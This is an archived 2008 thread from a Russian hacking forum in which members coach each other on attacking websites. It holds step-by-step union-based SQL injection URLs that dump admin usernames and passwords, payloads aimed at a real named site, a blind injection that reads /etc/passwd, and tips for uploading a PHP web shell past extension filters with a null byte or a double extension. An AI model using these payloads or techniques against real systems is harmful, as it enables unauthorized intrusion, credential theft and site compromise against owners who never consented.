HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.03.2008, 02:04
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

лана проехали. но дайте понять смысл. если параметры не верны страница должна отобразится с ошибкой, если верны то без. это означает что скуль есть. так? дальнейшие действия?
 
Ответить с цитированием

  #2  
Старый 16.03.2008, 07:07
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*
 
Ответить с цитированием

  #3  
Старый 16.03.2008, 17:08
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


По умолчанию

Цитата:
Сообщение от ZET36  
4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*

бред, если считать что у него скуль в авторизации. где оно по твоему выводить будет?
только посимвольный перебор
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #4  
Старый 16.03.2008, 17:16
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

дядя blackybr шарит . папсов видно издалека. Это ж не простая скуля. асю дашь?
 
Ответить с цитированием

  #5  
Старый 18.03.2008, 15:46
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

У меня имеется сайт-файлообменник, при реге у тебя создаются на сайте папка site.com/upload/user/ в которую можно заливать все что угодно, например ссылка на залитый файл будет выглядеть site.com/upload/user/file.x. Я пытался залить файл shell.php, но при попытке пройти по ссылке upload/user/shell.php сервер предлагает его скачать как shell_php.htm т.е. он его переименовывает хотя ссылка на файл остается upload/user/shell.php и содеожимое файла "500 Internal Server Error", а если имя неверно, то выкидывает ошибку 404. Файловый архив самописный. Вопрос: Можно ли как-нибудь залить шелл?

Последний раз редактировалось QZAR-X; 18.03.2008 в 15:50..
 
Ответить с цитированием

  #6  
Старый 16.03.2008, 07:30
hiv
Новичок
Регистрация: 15.07.2007
Сообщений: 24
Провел на форуме:
593997

Репутация: 11
По умолчанию

Вот запрос, судя по всему 3 таблицы :
http://city.ab.ru/index.php?pg=show&kat=-1+order+by+3/*
дальше
http://city.ab.ru/index.php?pg=show&kat=-1+union+select+1,2,3/*

You have an error in your SQL syntax near 'union select 1,2,3/*' at line 1

Копаем дальше... непонятно пока ничего

хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?
 
Ответить с цитированием

  #7  
Старый 16.03.2008, 07:46
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


По умолчанию

Цитата:
Сообщение от hiv  
хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?
Файлы можешь читать, так что скрипт пиши, ищи полезные файлы и читай

Код:
http://city.ab.ru/index.php?pg=show&kat=12%20and%20ascii(substring(load_file(0x2F6574632F706173737764),1,1))=35
больше ничего полезного имхо, т.к. кавычки экранируются
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 16.03.2008 в 07:50..
 
Ответить с цитированием

  #8  
Старый 16.03.2008, 16:24
MSDEN
Новичок
Регистрация: 07.05.2007
Сообщений: 12
Провел на форуме:
77696

Репутация: 1
По умолчанию

залил шелл на сайт через форму для загрузки изображений, но чтобы его залить пришлось расширение поменять на gif, а как php то теперь сделать? ((((
при переходе на изображение просто пустое окно огромного размера
 
Ответить с цитированием

  #9  
Старый 16.03.2008, 16:29
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

попробуй в конце урл добавить %00
или залей как .php.gif
 
Ответить с цитированием

  #10  
Старый 16.03.2008, 16:40
MSDEN
Новичок
Регистрация: 07.05.2007
Сообщений: 12
Провел на форуме:
77696

Репутация: 1
По умолчанию

эхх нитак и нитак не получилось (((
после заливки там меняется название файла и поулчается то же самое blablabal.gif,
%00 тоже не помогло ( Всеравно спасибо
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.